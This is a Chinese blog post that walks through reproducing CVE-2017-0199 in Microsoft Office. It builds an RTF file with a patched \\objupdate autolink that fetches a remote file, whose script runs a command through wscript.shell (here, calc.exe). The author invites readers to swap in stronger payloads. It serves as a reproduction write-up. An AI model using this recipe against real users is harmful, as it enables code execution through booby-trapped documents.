CVE-2017-0199 复现 - 中国红客帝国官网-Honker EmPire For China - Powered by H.E.C
网络爱好者的栖息之地,让我们的网络技术更上一层楼!!!

CVE-2017-0199 复现

无法 技术文章
作者:铮铮


打开文档就弹个计算器

不久爆了一堆0day 然而我正在准备考试所以一直没时间测试

CVE-2017-0199

今天先试一试2017.4.11(正好我生日来着2333)爆出的CVE-2017-0199

0x001 环境准备

这里我用的是apmserv 环境什么的凑合凑合吧

在apache设置处找到conf/mime.types

添加

					
				
1
					
				
AddType application/rtf .rtf

0x002 过程

我们去网站根目录新建一个rtf 1.rtf

接着我们随便找个地方新建个word文档 这里用2007演示

插入=>对象=>由文件创建=>链接到文件

然后将word另存为rtf格式 exp.rtf

用记事本打开exp.rtf

搜索

\object\objautlink\rsltpict

替换为

\object\objautlink\objupdate\rsltpict

回到1.rtf 也用记事本格式打开

将内容改为

					
				
1
2
3
4
					
				
<script>
var fzzheng = new ActiveXObject("wscript.shell");
fzzheng.Run("%SystemRoot%\\system32\\calc.exe");
</script>

最后修改Apache的配置

重启apache

打开exp.rtf

0x003 小结

这篇没什么好结的·····

1.rtf里面的内容就要各位大牛自由发挥了

远不止弹一个计算器这么简单

最后

作为一个好学生…

我的心愿是…

世界和平…


标签: 暂无标签

免责声明:

本站提供的资源,都来自网络,版权争议与本站无关,所有内容及软件的文章仅限用于学习和研究目的。不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负,我们不保证内容的长久可用性,通过使用本站内容随之而来的风险与本站无关,您必须在下载后的24个小时之内,从您的电脑/手机中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。侵删请致信E-mail:22365412@qq.com

同类推荐
评论列表

    Hax0rs  板凳 发表于2017-06-24 19:50 @回复
    你怎么这么叼
    铮铮  沙发 发表于2017-04-29 20:33 @回复
    铮铮's blog    -     www.fzzheng.cn